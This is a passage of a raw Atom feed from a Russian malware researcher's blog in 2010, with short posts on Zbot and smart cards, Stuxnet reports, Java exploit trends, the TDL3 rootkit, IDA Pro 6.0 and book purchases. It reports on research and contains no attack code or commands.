Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_gn-7ejyJv08/TNrNnFUGVFI/AAAAAAAAAvM/orV9caVK3OY/s72-c/spy_img5.gif' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-2653229358506393297</id><published>2010-11-03T17:21:00.003+03:00</published><updated>2010-11-03T18:38:50.229+03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Malware'/><category scheme='http://www.blogger.com/atom/ns#' term='Zeus'/><category scheme='http://www.blogger.com/atom/ns#' term='SmartCard'/><title type='text'>Смарт-карты не панацея для ДБО</title><content type='html'>Совместно с Group-IB делали один ресеч и в процессе были получены интересные результаты. Модификация Zbot полученная в процессе&amp;nbsp;криминалистической&amp;nbsp;экспертизы оказалась достаточно интересной, так как позволяла злоумышленнику делать удаленно запросы к смарт-карте.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_gn-7ejyJv08/TNF0gFcrxgI/AAAAAAAAAvI/-f5XP1k_y_8/s1600/3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="http://4.bp.blogspot.com/_gn-7ejyJv08/TNF0gFcrxgI/AAAAAAAAAvI/-f5XP1k_y_8/s400/3.PNG" width="301" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;Подробности в нашем&amp;nbsp;корпоративном&amp;nbsp;&lt;a href="http://habrahabr.ru/company/eset/blog/107520/"&gt;блоге&lt;/a&gt; ;)&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-2653229358506393297?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/2653229358506393297/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2010/11/blog-post.html#comment-form' title='Комментарии: 0'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/2653229358506393297'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/2653229358506393297'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2010/11/blog-post.html' title='Смарт-карты не панацея для ДБО'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_gn-7ejyJv08/TNF0gFcrxgI/AAAAAAAAAvI/-f5XP1k_y_8/s72-c/3.PNG' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-4381211649564102412</id><published>2010-11-03T00:07:00.001+03:00</published><updated>2011-10-19T15:35:47.503+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Stuxnet'/><category scheme='http://www.blogger.com/atom/ns#' term='0-day'/><category scheme='http://www.blogger.com/atom/ns#' term='Exploits'/><category scheme='http://www.blogger.com/atom/ns#' term='Cyberwar'/><title type='text'>Stuxnet under the microscope (revision 1.2)</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;Сегодня обновили наше исследование "&lt;a href="http://www.eset.com/resources/white-papers/Stuxnet_Under_the_Microscope.pdf"&gt;Stuxnet under the microscope&lt;/a&gt;" до версии 1.2, внесли немного косметических правок. Но самое главное добавили описание последней 0-day уязвимости, которая пока не была озвучена подробно, речь идет о повышении привилегий через Task Scheduler. В нашем отчете мы подробно рассмотрели то, как червь Stuxnet эксплуатирует эту уязвимость для повышения привилегий под Vista/Win7. Все использованные вектора для атаки червем Stuxnet выглядят следующем образом:&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_gn-7ejyJv08/TNB9HbsPwPI/AAAAAAAAAuw/9ZdNvJGZk60/s1600/screen-capture-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="285" src="http://3.bp.blogspot.com/_gn-7ejyJv08/TNB9HbsPwPI/AAAAAAAAAuw/9ZdNvJGZk60/s400/screen-capture-1.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-4381211649564102412?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/4381211649564102412/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2010/11/stuxnet-under-microscope-revision-12.html#comment-form' title='Комментарии: 0'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/4381211649564102412'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/4381211649564102412'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2010/11/stuxnet-under-microscope-revision-12.html' title='Stuxnet under the microscope (revision 1.2)'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_gn-7ejyJv08/TNB9HbsPwPI/AAAAAAAAAuw/9ZdNvJGZk60/s72-c/screen-capture-1.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-4399100162957758982</id><published>2010-11-02T23:54:00.000+03:00</published><updated>2010-11-02T23:54:49.321+03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Reflections'/><category scheme='http://www.blogger.com/atom/ns#' term='Books'/><title type='text'>Опыт заказа книг с amazon</title><content type='html'>На прошлой неделе я решил попробовать заказать твердую копию одной книжицы с &lt;a href="http://amzon.com/"&gt;amazon&lt;/a&gt;, ибо по тем ценам, по которым предлагают англоязычную литературу интернет-магазины рунета, ну просто не в какие ворота. Недолго думая я посмотрел на цену вместе с доставкой и обещанные сроки в 5 дней, решил таки рискнуть. В среднем книжка с доставкой в &amp;nbsp;msk обходится менее двух тысяч рублей, что вполне приемлемо для такой покупки с учетом меньшего количество опечаток и идиотизмов переводчиков. К моему удивлению все было доставлено в срок, причем можно отслеживать перемещение своей посылки на сайте amazon:&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_gn-7ejyJv08/TNB5b0X7oiI/AAAAAAAAAus/yMl2JJ1dPvM/s1600/screen-capture.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="222" src="http://1.bp.blogspot.com/_gn-7ejyJv08/TNB5b0X7oiI/AAAAAAAAAus/yMl2JJ1dPvM/s400/screen-capture.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;С учетом полученного опыта теперь буду заказывать книжки исключительно таким образом, дабы не напрягать мои забугорных коллег.&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-4399100162957758982?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/4399100162957758982/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2010/11/amazon.html#comment-form' title='Комментарии: 2'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/4399100162957758982'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/4399100162957758982'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2010/11/amazon.html' title='Опыт заказа книг с amazon'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_gn-7ejyJv08/TNB5b0X7oiI/AAAAAAAAAus/yMl2JJ1dPvM/s72-c/screen-capture.png' height='72' width='72'/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-204690508772803589</id><published>2010-10-27T20:12:00.003+04:00</published><updated>2010-10-27T23:51:59.185+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Books'/><title type='text'>Malware Analyst's Cookbook</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: left;"&gt;Интересная книжка появилась на прилавке &lt;a href="http://www.amazon.com/Malware-Analysts-Cookbook-DVD-Techniques/dp/0470613033"&gt;амазона&lt;/a&gt;.&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_gn-7ejyJv08/TMhO3SrUQxI/AAAAAAAAAuo/LKd27oKfiyg/s1600/0470613033.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://1.bp.blogspot.com/_gn-7ejyJv08/TMhO3SrUQxI/AAAAAAAAAuo/LKd27oKfiyg/s320/0470613033.jpg" width="255" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-204690508772803589?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/204690508772803589/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2010/10/malware-analysts-cookbook.html#comment-form' title='Комментарии: 0'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/204690508772803589'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/204690508772803589'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2010/10/malware-analysts-cookbook.html' title='Malware Analyst&apos;s Cookbook'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_gn-7ejyJv08/TMhO3SrUQxI/AAAAAAAAAuo/LKd27oKfiyg/s72-c/0470613033.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-4929603950786211588</id><published>2010-10-22T14:47:00.001+04:00</published><updated>2011-10-19T15:35:57.613+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Stuxnet'/><category scheme='http://www.blogger.com/atom/ns#' term='Events'/><category scheme='http://www.blogger.com/atom/ns#' term='Reflections'/><category scheme='http://www.blogger.com/atom/ns#' term='Cyberwar'/><title type='text'>Вчера довелось прочесть лекцию в МГУ</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;Вчера прочитал лекцию в стенах ВМиК МГУ в рамках цикла семинаров &amp;quot;&lt;a href="http://microsoft.cs.msu.su/events/Pages/sdat.aspx"&gt;Технологии разработки и анализа программ&lt;/a&gt;&amp;quot;. Хотя я изначально я предупреждал организаторов, что тема моего доклада будет отличаться от тематики семинара и в основном я хотел бы поговорить о целенаправленных атаках на примере червя Stuxnet, проблемах реверсинга больших программ и о возможных сценариях развития кибервойн, но их это не остановило. На мой взгляд получилось интересно и пока меня на втором часу лекции не прервали организаторы :), я никак не мог остановится, настолько у меня накопилось много информации и мыслей по этой теме. А прервать им меня пришлось, так как семинар состоит из двух частей, первая это доклад, а вторая собственно дискуссионная часть.&lt;br&gt;&lt;br&gt;&lt;div id="__ss_5528094" style="width: 425px;"&gt;&lt;object height="355" id="__sse5528094" width="425"&gt;&lt;param name="movie" value="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=stuxnetmsu-101022045245-phpapp02&amp;amp;stripped_title=stuxnet-msu&amp;amp;userName=matrosov"&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;param name="allowScriptAccess" value="always"&gt;&lt;embed name="__sse5528094" src="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=stuxnetmsu-101022045245-phpapp02&amp;amp;stripped_title=stuxnet-msu&amp;amp;userName=matrosov" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="355"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/div&gt;&lt;br&gt;&lt;/div&gt;&lt;a href="http://amatrosov.blogspot.com/2010/10/blog-post.html#more"&gt;Дальше »&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-4929603950786211588?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/4929603950786211588/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2010/10/blog-post.html#comment-form' title='Комментарии: 0'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/4929603950786211588'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/4929603950786211588'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2010/10/blog-post.html' title='Вчера довелось прочесть лекцию в МГУ'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-6535527730921720431</id><published>2010-10-19T00:43:00.005+04:00</published><updated>2010-10-19T13:00:41.522+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Java'/><category scheme='http://www.blogger.com/atom/ns#' term='Statistics'/><category scheme='http://www.blogger.com/atom/ns#' term='Exploits'/><title type='text'>По количеству инцидентов Java затмила Adobe</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;Не так давно в нашей статистике я &lt;a href="http://www.eset.ru/.company/news/?id=11367&amp;amp;year=2010"&gt;указывал&lt;/a&gt; на явный тренд увеличения числа инцидентов с эксплойтами для платформы Java. Сегодня MS опубликовала &lt;a href="http://blogs.technet.com/b/mmpc/archive/2010/10/18/have-you-checked-the-java.aspx"&gt;пост&lt;/a&gt; по теме, в котором делает акцент на этой же тенденции.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_gn-7ejyJv08/TLyuy0wA1LI/AAAAAAAAAuM/QyjqPqpB7EA/s1600/5824.JavaPDFAttacksthrough2010Q31_4ECD269A.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="380" src="http://3.bp.blogspot.com/_gn-7ejyJv08/TLyuy0wA1LI/AAAAAAAAAuM/QyjqPqpB7EA/s400/5824.JavaPDFAttacksthrough2010Q31_4ECD269A.gif" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;Все эксплуатируемые уязвимости мягко говоря с душком:&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;/div&gt;&lt;div style="font: 12.0px Helvetica; margin: 0.0px 0.0px 0.0px 0.0px;"&gt;CVE-2008-5353&lt;/div&gt;&lt;div style="font: 12.0px Helvetica; margin: 0.0px 0.0px 0.0px 0.0px;"&gt;CVE-2009-3867&lt;/div&gt;&lt;div style="font: 12.0px Helvetica; margin: 0.0px 0.0px 0.0px 0.0px;"&gt;CVE-2010-0094&lt;/div&gt;&lt;div style="font: 12.0px Helvetica; margin: 0.0px 0.0px 0.0px 0.0px; min-height: 14.0px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="font: 12.0px Helvetica; margin: 0.0px 0.0px 0.0px 0.0px;"&gt;WTF!&lt;br /&gt;&lt;br /&gt;Статистика&amp;nbsp;активности Java-уязвимостей&amp;nbsp;подтверждается и по ту сторону баррикад (скриншот позаимствован у&amp;nbsp;&lt;a href="http://krebsonsecurity.com/2010/10/java-a-gift-to-exploit-pack-makers/?utm_source=feedburner&amp;amp;utm_medium=feed&amp;amp;utm_campaign=Feed:+KrebsOnSecurity+(Krebs+on+Security)"&gt;Кербса&lt;/a&gt;).&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_gn-7ejyJv08/TL1d8Ok8RlI/AAAAAAAAAuU/MCnmPlksu-Q/s1600/blackholemain.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="290" src="http://4.bp.blogspot.com/_gn-7ejyJv08/TL1d8Ok8RlI/AAAAAAAAAuU/MCnmPlksu-Q/s400/blackholemain.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-6535527730921720431?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/6535527730921720431/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2010/10/java-adobe.html#comment-form' title='Комментарии: 0'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/6535527730921720431'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/6535527730921720431'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2010/10/java-adobe.html' title='По количеству инцидентов Java затмила Adobe'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_gn-7ejyJv08/TLyuy0wA1LI/AAAAAAAAAuM/QyjqPqpB7EA/s72-c/5824.JavaPDFAttacksthrough2010Q31_4ECD269A.gif' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-5047903359910999811</id><published>2010-10-12T15:46:00.001+04:00</published><updated>2010-10-12T17:10:03.607+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Rootkits'/><category scheme='http://www.blogger.com/atom/ns#' term='Tools'/><category scheme='http://www.blogger.com/atom/ns#' term='TDL3'/><title type='text'>Вышла наша статейка в VB magazine за октябрь</title><content type='html'>В начале лета мы проводили подробное&amp;nbsp;&lt;a href="http://amatrosov.blogspot.com/2010/06/win32olmarik-tdl3.html"&gt;исследование&lt;/a&gt;&amp;nbsp;последних, на тот момент, модификаций руткита TDL3. В тоже самое время мы отправили статью в&amp;nbsp;&lt;a href="http://www.virusbtn.com/virusbulletin/index"&gt;VB magazine&lt;/a&gt;&amp;nbsp;рассказывающую&amp;nbsp;немного подробнее о возможностях внутренней файловой системы этого руткита. И вот наконец она опубликована в&amp;nbsp;октябрьском&amp;nbsp;номере "&lt;a href="http://www.virusbtn.com/virusbulletin/archive/2010/10/vb201010-TDSS#citation.1"&gt;Rooting about in TDSS&lt;/a&gt;".&lt;br /&gt;Интерес&amp;nbsp;представляет не только содержимое статьи, которое я смогу&amp;nbsp;опубликовать&amp;nbsp;в публичный доступ только по истечении 3 месяцев:), но и утилита&amp;nbsp;&lt;a href="http://j.mp/tdl_dump"&gt;tfd.exe&lt;/a&gt;. Тулза свободно распространяется и предназначена для дампа содержимого файловой системы TDL3 для быстрого получения информации о боте.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-5047903359910999811?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/5047903359910999811/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2010/10/vb-magazine.html#comment-form' title='Комментарии: 0'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/5047903359910999811'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/5047903359910999811'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2010/10/vb-magazine.html' title='Вышла наша статейка в VB magazine за октябрь'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-8947563100806136430</id><published>2010-10-02T16:19:00.002+04:00</published><updated>2010-10-03T18:33:23.565+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='IdaPython'/><category scheme='http://www.blogger.com/atom/ns#' term='IDA'/><category scheme='http://www.blogger.com/atom/ns#' term='Hex-Rays'/><category scheme='http://www.blogger.com/atom/ns#' term='Reversing'/><title type='text'>Обновление IDA Pro до версии 6.0</title><content type='html'>Вчера тихо и незаметно вышла обновленная версия наиболее часто используемой мной тулзы IDA Pro до версии 6.0. Самое большое нововведение этой версии заключается в том, что теперь мы имеем единый графический интерфейс на QT для Win/Mac/Linux платформ. И выглядит он даже удобнее прежнего + плюс еще была замечена более быстрая загрузка и скорость работы. Вот так оно выглядит на моем маке:&lt;br&gt;&lt;div&gt;&lt;br&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_gn-7ejyJv08/TKcfrgCIkQI/AAAAAAAAAtk/1lvgE9vjd2E/s1600/screen-capture.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="242" src="http://1.bp.blogspot.com/_gn-7ejyJv08/TKcfrgCIkQI/AAAAAAAAAtk/1lvgE9vjd2E/s400/screen-capture.png" width="400"&gt;&lt;/a&gt;&lt;/div&gt;&lt;a href="http://1.bp.blogspot.com/_gn-7ejyJv08/TKcfrgCIkQI/AAAAAAAAAtk/1lvgE9vjd2E/s1600/screen-capture.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;/a&gt;&lt;br&gt;&lt;a href="http://1.bp.blogspot.com/_gn-7ejyJv08/TKcfrgCIkQI/AAAAAAAAAtk/1lvgE9vjd2E/s1600/screen-capture.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;/a&gt;&lt;br&gt;&lt;a href="http://1.bp.blogspot.com/_gn-7ejyJv08/TKcfrgCIkQI/AAAAAAAAAtk/1lvgE9vjd2E/s1600/screen-capture.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;/a&gt;&lt;/div&gt;&lt;a href="http://amatrosov.blogspot.com/2010/10/ida-pro-60.html#more"&gt;Дальше »&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-8947563100806136430?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/8947563100806136430/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2010/10/ida-pro-60.html#comment-form' title='Комментарии: 2'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/8947563100806136430'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/8947563100806136430'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2010/10/ida-pro-60.html' title='Обновление IDA Pro до версии 6.0'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_gn-7ejyJv08/TKcfrgCIkQI/AAAAAAAAAtk/1lvgE9vjd2E/s72-c/screen-capture.png' height='72' width='72'/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-7441120928026872158</id><published>2010-10-01T12:28:00.003+04:00</published><updated>2011-10-19T15:36:19.252+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Stuxnet'/><category scheme='http://www.blogger.com/atom/ns#' term='Video'/><category scheme='http://www.blogger.com/atom/ns#' term='SCADA'/><category scheme='http://www.blogger.com/atom/ns#' term='Reversing'/><category scheme='http://www.blogger.com/atom/ns#' term='Cyberwar'/><title type='text'>Another report about Stuxnet</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;Сегодня Symantec наконец выпустили свой репорт о Stuxnet, не смотря на то, что мы их &lt;a href="http://amatrosov.blogspot.com/2010/09/stuxnet-under-microscope.html"&gt;опередили&lt;/a&gt; у них раскрыта SCADA составляющая гораздо подробнее (во всем остальном наш отчет лучше :)). Поэтому всем интересующимся рекомендую к прочтению "&lt;a href="http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_stuxnet_dossier.pdf"&gt;W32.Stuxnet Dossier&lt;/a&gt;".&lt;br /&gt;Ну, а на сладкое демонстрация последствий заражения PLC контроллера с VB'2010 ;)&lt;br /&gt;&lt;br /&gt;&lt;object height="340" width="560"&gt;&lt;param name="movie" value="http://www.youtube.com/v/ocuemvb46us?fs=1&amp;amp;hl=ru_RU&amp;amp;rel=0"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/ocuemvb46us?fs=1&amp;amp;hl=ru_RU&amp;amp;rel=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="560" height="340"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-7441120928026872158?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/7441120928026872158/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2010/10/another-report-about-stuxnet.html#comment-form' title='Комментарии: 0'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/7441120928026872158'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/7441120928026872158'/><link rel='alternate' type='text/html' 